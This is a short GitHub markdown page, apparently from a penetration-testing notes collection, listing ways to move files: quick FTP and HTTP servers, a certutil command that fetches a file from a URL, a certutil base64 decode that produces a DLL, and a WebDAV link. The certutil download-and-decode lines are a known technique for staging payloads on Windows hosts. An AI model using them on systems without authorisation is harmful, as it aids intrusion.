Skip to content

Latest commit

 

History

History
21 lines (11 loc) · 525 Bytes

File-Transfer.md

File metadata and controls

21 lines (11 loc) · 525 Bytes

Simple FTP Server:

python -m pyftpdlib -p 21 --write

Simple HTTP Server:

python -m SimpleHTTPServer <port (defaults to 8000)>

Certutil:

Base64 encode your file if needed

certutil.exe -urlcache -split -f http://example/file.txt file.blah

Base64 decode using certutil:

certutil -decode dll.txt my.dll

Simple WebDAV Server: (Allows you to run commands on Windows systems as if the file were local)

https://www.trustedsec.com/blog/how-to-set-up-a-quick-simple-webdav-server-for-remote-file-sharing/